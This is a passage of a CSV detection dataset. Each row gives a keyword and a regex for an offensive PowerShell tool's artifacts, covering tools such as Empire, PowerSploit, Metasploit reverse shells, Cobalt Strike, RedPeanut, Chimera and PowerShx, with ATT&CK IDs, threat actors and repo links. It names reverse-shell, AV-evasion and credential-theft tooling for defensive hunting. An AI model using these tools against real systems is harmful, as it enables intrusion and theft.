Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55259" "*PowerShell_PoC.zip*",".{0,1000}PowerShell_PoC\.zip.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55260" "*powershell_privesc_bypassuac_eventvwr*",".{0,1000}powershell_privesc_bypassuac_eventvwr.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - 
T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55261" "*powershell_privesc_sherlock*",".{0,1000}powershell_privesc_sherlock.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - 
FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55262" "*powershell_reflective_mimikatz*",".{0,1000}powershell_reflective_mimikatz.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","55263" "*powershell_reverse_shell.ps1*",".{0,1000}powershell_reverse_shell\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","55264" "*powershell_reverse_tcp.*",".{0,1000}powershell_reverse_tcp\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55265" "*powershell_reverse_tcp.py*",".{0,1000}powershell_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","55266" "*powershell_reverse_tcp_v2.py*",".{0,1000}powershell_reverse_tcp_v2\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","55267" "*powershell_to_vbs,APC_Injection,RemoteThreadContext,RemoteThreadSuspended*",".{0,1000}powershell_to_vbs,APC_Injection,RemoteThreadContext,RemoteThreadSuspended.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","55268" "*powershell_to_vbs.ps1*",".{0,1000}powershell_to_vbs\.ps1.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","55269" "*powershell-admin-download-execute.ino*",".{0,1000}powershell\-admin\-download\-execute\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","55270" "*PowershellAgentGenerator.*",".{0,1000}PowershellAgentGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55271" "*PowershellAmsiGenerator*",".{0,1000}PowershellAmsiGenerator.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55272" "*PowerShellArsenal*",".{0,1000}PowerShellArsenal.{0,1000}","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. 
etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","N/A","9","870","203","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z","55273" "*PowerShellArtifactGenerator.py*",".{0,1000}PowerShellArtifactGenerator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","55274" "*PowershellCradleGenerator.*",".{0,1000}PowershellCradleGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55275" "*PowerShellEmpire*",".{0,1000}PowerShellEmpire.{0,1000}","offensive_tool_keyword","empire","PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. 
many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://www.powershellempire.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55276" "*PowerShellExecuter.cs*",".{0,1000}PowerShellExecuter\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55277" "*powershell-import *.ps1*",".{0,1000}powershell\-import\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments 
that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55278" "*powershell-import /var/www/ps/*.ps1*",".{0,1000}powershell\-import\s\/var\/www\/ps\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","55279" "*powershell-import*Invoke-Kerberoast.ps1*",".{0,1000}powershell\-import.{0,1000}Invoke\-Kerberoast\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55280" "*powershell-import*ShareFinder.ps1*",".{0,1000}powershell\-import.{0,1000}ShareFinder\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55281" "*PowershellKerberos-main*",".{0,1000}PowershellKerberos\-main.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","55282" "*PowerShellMafia*",".{0,1000}PowerShellMafia.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation 
tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55283" "*PowerShellMafia/PowerSCCM*",".{0,1000}PowerShellMafia\/PowerSCCM.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55284" "*PowerShellMafia/PowerSploit*",".{0,1000}PowerShellMafia\/PowerSploit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55285" "*PowerShellObfuscator.ps1*",".{0,1000}PowerShellObfuscator\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI 
signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","55286" "*PowerShellRunner*runner.ps1*",".{0,1000}PowerShellRunner.{0,1000}runner\.ps1.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","1","N/A","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","55287" "*PowershellRunner.h*",".{0,1000}PowershellRunner\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","55288" "*PowerShellRunner_dll_len*",".{0,1000}PowerShellRunner_dll_len.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","55289" "*PowerShellStager*",".{0,1000}PowerShellStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","55290" "*PowerShell-Suite*",".{0,1000}PowerShell\-Suite.{0,1000}","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. 
This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","N/A","10","2659","769","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z","55291" "*PowershellTools-main.zip*",".{0,1000}PowershellTools\-main\.zip.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","55292" "*PowerShx.dll*",".{0,1000}PowerShx\.dll.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55293" "*PowerShx.exe*",".{0,1000}PowerShx\.exe.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55294" "*PowerShx.sln*",".{0,1000}PowerShx\.sln.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55295" 
"*PowerShxDll.csproj*",".{0,1000}PowerShxDll\.csproj.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55296" "*PowerShx-master*",".{0,1000}PowerShx\-master.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55297" "*PowerSploit*",".{0,1000}PowerSploit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55298" "*PowerSploit-*.zip*",".{0,1000}PowerSploit\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid 
